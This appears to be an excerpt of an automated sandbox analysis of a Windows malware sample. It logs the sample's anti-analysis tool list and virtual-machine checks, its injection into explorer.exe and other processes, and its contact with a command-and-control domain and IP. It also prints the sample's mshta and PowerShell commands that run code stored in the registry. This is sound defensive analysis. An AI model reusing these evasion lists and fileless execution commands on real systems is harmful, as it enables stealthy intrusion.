                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
                    Source: wscript.exe, 00000001.00000003.572498942.0000017634237000.00000004.00000001.sdmpBinary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
                    Source: C:\Windows\System32\wscript.exe TID: 3256Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2968Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6236Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.dllJump to dropped file
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05591802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,21_2_05591802
                    Source: mshta.exe, 0000001E.00000003.636430270.0000014A8EE78000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\-
                    Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: explorer.exe, 00000025.00000000.695253340.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}85-ab02-99bb52d3fb8b}\InstaB^
                    Source: explorer.exe, 00000025.00000000.714478354.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
                    Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmpBinary or memory string: 0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BU
                    Source: RuntimeBroker.exe, 00000027.00000000.747653122.000002413A440000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: rundll32.exe, 00000015.00000003.621150182.00000000008E3000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}-0E2F-4A16-A381-3E560C68BC8B
                    Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
                    Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bc
                    Source: explorer.exe, 00000025.00000000.712725595.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
                    Source: explorer.exe, 00000025.00000000.715825967.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
                    Source: rundll32.exe, 00000015.00000003.621150182.00000000008E3000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW,
                    Source: explorer.exe, 00000025.00000000.729862046.00000000053D7000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
                    Source: explorer.exe, 00000025.00000000.715825967.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
                    Source: mshta.exe, 0000001E.00000003.636522646.0000014A8EE47000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05581577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,21_2_05581577
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055714A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,21_2_055714A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05586E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,21_2_05586E4E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05585529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,21_2_05585529
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServerJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05592A09 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,21_2_05592A09

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeDomain query: atl.bigbigpoppa.com
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.251.90.253 80Jump to behavior
                    Benign windows process drops PE filesShow sources
                    Source: C:\Windows\System32\wscript.exeFile created: fum.cpp.1.drJump to dropped file
                    Maps a DLL or memory area into another processShow sources
                    Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                    Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                    Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
                    Compiles code for process injection (via .Net compiler)Show sources
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.0.csJump to dropped file
                    Allocates memory in foreign processesShow sources
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: 160000 protect: page execute and read and writeJump to behavior
                    Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\System32\rundll32.exe base: 195D87A0000 protect: page execute and read and write
                    Creates a thread in another existing process (thread injection)Show sources
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 9B851580Jump to behavior
                    Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
                    Source: C:\Windows\System32\control.exeThread created: unknown EIP: 9B851580
                    Writes to foreign memory regionsShow sources
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF64DBB12E0Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 160000Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF64DBB12E0Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: ED6000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFA9B851580Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2AD0000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFA9B851580Jump to behavior
                    Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 46DA8FD000
                    Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
                    Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF616D15FD0
                    Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 195D87A0000
                    Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF616D15FD0
                    Changes memory attributes in foreign processes to executable or writableShow sources
                    Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
                    Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
                    Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
                    Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
                    Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
                    Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
                    Injects code into the Windows Explorer (explorer.exe)Show sources
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3472 base: ED6000 value: 00Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3472 base: 7FFA9B851580 value: EBJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3472 base: 2AD0000 value: 80Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3472 base: 7FFA9B851580 value: 40Jump to behavior
                    Modifies the context of a thread in another process (thread injection)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 2896Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3472Jump to behavior
                    Source: C:\Windows\System32\control.exeThread register set: target process: 3472
                    Source: C:\Windows\System32\control.exeThread register set: target process: 4612
                    Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP'Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP'
                    Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                    Source: explorer.exe, 00000025.00000000.681449997.0000000005EA0000.00000004.00000001.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmpBinary or memory string: Progman
                    Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                    Source: explorer.exe, 00000025.00000000.701018945.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
                    Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                    Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E56CD6 cpuid 21_2_00E56CD6
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E566CE GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,21_2_00E566CE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E56CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,21_2_00E56CD6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0558E3F3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,21_2_0558E3F3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E55A5D GetVersion,lstrcat,lstrcat,lstrcat,GetLastError,21_2_00E55A5D
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: procmon.exe
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: avz.exe
